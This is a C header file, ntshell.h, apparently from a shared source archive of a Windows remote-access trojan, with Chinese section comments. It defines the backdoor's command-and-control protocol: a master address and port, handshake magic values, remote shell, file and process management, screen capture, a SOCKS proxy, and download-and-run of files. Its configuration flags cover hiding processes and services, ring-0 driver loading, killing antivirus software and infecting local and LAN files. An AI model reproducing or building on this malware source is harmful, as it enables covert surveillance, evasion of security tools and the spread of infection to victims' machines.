www.pudn.com > ntshell.rar > ntshell.h
#if !defined(ntshell_h)
#define ntshell_h
#if _MSC_VER > 1000
#pragma once
#endif // _MSC_VER > 1000
#ifdef __cplusplus
#pragma warning(disable : 4200)
#endif
#define NTSHELL_MINORVERSION 78
#define NTSHELL_MAJORVERSION 0
#define NTSHELL_VERSION (NTSHELL_MINORVERSION | (NTSHELL_MAJORVERSION << 8))
#define CFG_BEGIN 0
#define CFG_END 1
#define CFG_MASTER_ADDR 2
#define CFG_MASTER_ADDR2 3
#define CFG_MASTER_PORT 4
#define CFG_LISTEN_PORT 5
#define CFG_WAIT_MODE 6
#define CFG_NEED_PWD 7
#define CFG_PASSWORD 8
#define CFG_GLOBAL_FLAGS 9
#define CFG_CONN_SPACE 10
#define CFG_PORT_HIJACK 11
#define CFG_RUN_METHOD 12
#define WORK_CONSOLE 0x5c698ea0
#define WORK_CMDSHELL 0x32279732
#define WORK_FILEMANAGER 0x835d2b99
#define WORK_SOCKPROXY 0xf2795541
#define WORK_SCREENCAPTURE 0xdc46070e
#define WORK_PROCESSMANAGER 0xcba01986
#define CONTROL_NEWCONNECT 0x5aba7788
#define CONTROL_QUERYINFO 0x58437964
#define CONTROL_NONE 0x12345678
#define CONTROL_REBOOT 0x774055a1
#define CONTROL_UPDATE 0x774055a2
#define CONTROL_UNINSTALL 0x774055a3
#define CONTROL_EXIT 0x774055a4
#define CONTROL_SHUTDOWN 0x774055a5
#define CONNECT_NEED_PWD 0x86570422
#define CONNECT_INVALID_PWD 0xffff0000
#define CMD_LISTPROCESS 1
#define CMD_KILLPROCESS 2
#define CMD_DOWNLOADFILE 3
#define CMD_EXECUTE 4
#define CMD_NEWINSTANCE 5
#define CMD_RUNCOMMAND 6
#define CMD_SHELLSESSION 7
#define CMD_SOCKPROXY 8
#define CMD_EXITCONSOLE 9
#define STATE_READY 0
#define CONN1_SLAVE_ASK 0x5468e21a
#define CONN1_MASTER_ANSWER 0x7714e029
#define CONN1_SLAVE_OK 0xff3a6bd6
#define CONN2_SLAVE_ASK 0x23516def
#define CONN2_MASTER_ANSWER 0x87654321
#define CONN2_SLAVE_OK 0xa3d51234
#define CONN3_MASTER_ANSWER 0x8566cae0
#define CONN3_SLAVE_OK 0x63374899
#define CONN4_MASTER_ANSWER 0x87845678
#define CONN4_SLAVE_OK 0x87654878
#define FLAG_ALLOW_HIDE_PROCESS 1
#define FLAG_ALLOW_RING0 2
#define FLAG_RUN_SERVICE_ALWAYS 4
#define FLAG_AUTO_KILL_AVSOFT 8
#define FLAG_AUTO_INFECT_FILE 16
#define FLAG_AUTO_INFECT_LAN_FILE 32
#define FLAG_RECORD_ERROR 64
#define FLAG_ALLOW_LOAD_DRIVER 128
#define FLAG_ALLOW_HIDE_SERVICE 256
#define FLAG_RING0_OPEN_FILE 512
#define FLAG_AUTO_BACKUP_FILE 1024
#define COMMAND_PENDING 0
#define COMMAND_FINISH 1
#define CONTROL_DISCONNECT 2
#define BUFFER_SIZE 4096
#define MAX_ADDRESS_LENGTH 64
#define MAX_PASSWORD_LENGTH 32
#define CONFIG_SECTION_SIZE 256
#define SERVICE_NAME "ntwscsvc"
typedef struct _NTSHELL_REQUEST
{
WORD ClientVersion;
WORD RequestClass;
WORD Reserved;
WORD Reserved2;
PVOID Request[];
} NTSHELL_REQUEST, *PNTSHELL_REQUEST;
typedef struct _NTSHELL_RESULTSET
{
WORD ServerVersion;
WORD ResultClass;
WORD MessageCode;
WORD Reserved;
DWORD ErrorCode;
DWORD NumberOfResults;
PVOID ResultSet[];
} NTSHELL_RESULTSET, *PNTSHELL_RESULTSET;
//////////////////////////////////////////////////////////////////////
// 文件管理器接口
//////////////////////////////////////////////////////////////////////
#define FILEMGR_LISTDRIVE 1
#define FILEMGR_LISTFILE 2
#define FILEMGR_GETFILEICON 3
#define FILEMGR_CREATEDIRECTORY 4
#define FILEMGR_REMOVEDIRECTORY 5
#define FILEMGR_READFILE 6
#define FILEMGR_WRITEFILE 7
#define FILEMGR_EXECUTEFILE 8
#define FILEMGR_DELETEFILE 9
#define FILEMGR_COPYFILE 10
#define FILEMGR_MOVEFILE 11
#define FILEMGR_SIMPLYREADFILE 12
typedef struct _FILEMGR_FILEINFO
{
DWORD FileAttributes;
FILETIME CreationTime;
FILETIME LastWriteTime;
DWORD FileSizeHigh;
DWORD FileSizeLow;
CHAR FileName[];
} FILEMGR_FILEINFO, *PFILEMGR_FILEINFO;
typedef struct _FILEMGR_DRIVEINFO
{
DWORD DriveType;
CHAR RootPathName[40];
CHAR VolumeName[16];
DWORD VolumeSerialNumber;
CHAR FileSystemName[16];
ULARGE_INTEGER TotalNumberOfBytes;
ULARGE_INTEGER TotalNumberOfFreeBytes;
} FILEMGR_DRIVEINFO, *PFILEMGR_DRIVEINFO;
typedef struct _FILEMGR_FILEICON
{
WORD Width;
WORD Height;
WORD BitCount;
BYTE Bits[];
} FILEMGR_FILEICON, *PFILEMGR_FILEICON;
typedef struct _FILEMGR_FILEREAD
{
CHAR FileName[MAX_PATH];
DWORD FileSize;
FILETIME CreationTime;
FILETIME LastWriteTime;
BYTE FileData[];
} FILEMGR_FILEREAD, *PFILEMGR_FILEREAD;
typedef struct _FILEMGR_FILEWRITE
{
CHAR FileName[MAX_PATH];
DWORD FileSize;
FILETIME CreationTime;
FILETIME LastWriteTime;
BYTE FileData[];
} FILEMGR_FILEWRITE, *PFILEMGR_FILEWRITE;
typedef struct _FILEMGR_FILENAME
{
union
{
CHAR FileName[];
CHAR PathName[];
};
} FILEMGR_FILENAME, *PFILEMGR_FILENAME;
typedef struct _FILEMGR_FILENAME2
{
CHAR FileName1[MAX_PATH];
CHAR FileName2[MAX_PATH];
} FILEMGR_FILENAME2, *PFILEMGR_FILENAME2;
//////////////////////////////////////////////////////////////////////
// 进程管理器接口
//////////////////////////////////////////////////////////////////////
#define PROCMGR_LISTPROCESS 1
#define PROCMGR_KILLPROCESS 2
#define PROCMGR_RUN 3
#define PROCMGR_FORCEKILLPROCESS 4
typedef struct _PROCMGR_PROCESSINFO
{
LARGE_INTEGER ProcessCreateTime;
LARGE_INTEGER ProcessCpuTime;
ULONG BasePriority;
ULONG ProcessId;
ULONG ParentProcessId;
ULONG TotalVirtualSizeBytes;
ULONG TotalPrivateBytes;
USHORT OffsetOfNextEntry;
USHORT OffsetOfProcessName;
USHORT OffsetOfUserName;
USHORT OffsetOfImagePath;
} PROCMGR_PROCESSINFO, *PPROCMGR_PROCESSINFO;
typedef struct _PROCMGR_PROCESSKILL
{
ULONG ProcessId;
} PROCMGR_PROCESSKILL, *PPROCMGR_PROCESSKILL;
typedef struct _PROCMGR_PROCESSRUN
{
WORD ShowWindow;
WORD Reserved;
CHAR ImagePath[];
} PROCMGR_PROCESSRUN, *PPROCMGR_PROCESSRUN;
//////////////////////////////////////////////////////////////////////
// 控制台接口
//////////////////////////////////////////////////////////////////////
#define CONSOLE_LISTPROCESS 1
#define CONSOLE_KILLPROCESS 2
#define CONSOLE_DOWNLOADFILE 3
#define CONSOLE_EXECUTE_1 4
#define CONSOLE_EXECUTE_2 5
#define CONSOLE_SENDMESSAGE 6
typedef struct _CONSOLE_PROCESSKILL
{
ULONG ProcessId;
} CONSOLE_PROCESSKILL, *PCONSOLE_PROCESSKILL;
typedef struct _CONSOLE_FILEDOWNLOAD
{
CHAR Url[MAX_PATH];
CHAR SavePath[MAX_PATH];
BOOL RunIt;
} CONSOLE_FILEDOWNLOAD, *PCONSOLE_FILEDOWNLOAD;
typedef struct _CONSOLE_EXECUTE
{
BOOL ShowResult;
DWORD TimeOut;
CHAR CommandLine[];
} CONSOLE_EXECUTE, *PCONSOLE_EXECUTE;
typedef struct _CONSOLE_MESSAGESEND
{
ULONG DisplayMethod;
CHAR MessageText[];
} CONSOLE_MESSAGESEND, *PCONSOLE_MESSAGESEND;
//////////////////////////////////////////////////////////////////////
// 屏幕监视接口
//////////////////////////////////////////////////////////////////////
#define SCREEN_FULL 1
#define SCREEN_DIFFERENCE 2
#define SCREEN_XOR 3
typedef struct _SCREENCAP_SCREENBITMAP
{
WORD Width;
WORD Height;
WORD Depth;
WORD Method;
DWORD Size;
BYTE Bits[];
} SCREENCAP_SCREENBITMAP, *PSCREENCAP_SCREENBITMAP;
//////////////////////////////////////////////////////////////////////
// 端口代理服务接口
//////////////////////////////////////////////////////////////////////
#define PROXYERR_SUCCESS 0
#define PROXYERR_ADDRTOOLONG 1
#define PROXYERR_OPENPORTFAILED 2
//////////////////////////////////////////////////////////////////////
// IO数据包格式
//////////////////////////////////////////////////////////////////////
typedef struct _PACK_TYPE_1
{
DWORD dwPackType : 2;
DWORD nPackSize : 30;
BYTE bPackData[];
} PACK_TYPE_1, *PPACK_TYPE_1;
typedef struct _PACK_TYPE_2
{
DWORD dwPackType : 2;
DWORD nPackSize : 30;
DWORD dwCrc32;
BOOL bCompressed : 1;
BOOL bEncrypted : 1;
DWORD nOriginalSize : 30;
BYTE bPackData[];
} PACK_TYPE_2, *PPACK_TYPE_2;
//////////////////////////////////////////////////////////////////////
// 系统信息查询接口
//////////////////////////////////////////////////////////////////////
#define QUERY_ENDQUERY 0
#define QUERY_PROCESSORNAME 1
#define QUERY_PROCESSORMHZ 2
#define QUERY_PHYSMEMORYSIZE 3
#define QUERY_SYSTEMVERSION 4
#define QUERY_COMPUTERNAME 5
#define QUERY_CURRENTUSERNAME 6
#define QUERY_SYSTEMROOT 7
#define QUERY_NTSHELLVERSION 8
typedef struct _QUERY_INFORMATION
{
WORD InformationClass;
} QUERY_INFORMATION, *PQUERY_INFORMATION;
typedef struct _QUERY_RESULTSET
{
WORD InformationClass;
WORD InformationLength;
BYTE Information[];
} QUERY_RESULTSET, *PQUERY_RESULTSET;
//////////////////////////////////////////////////////////////////////
// 服务端消息代码
//////////////////////////////////////////////////////////////////////
#define MSG_NONE 0
#define MSG_RING0_DISABLED 1
#endif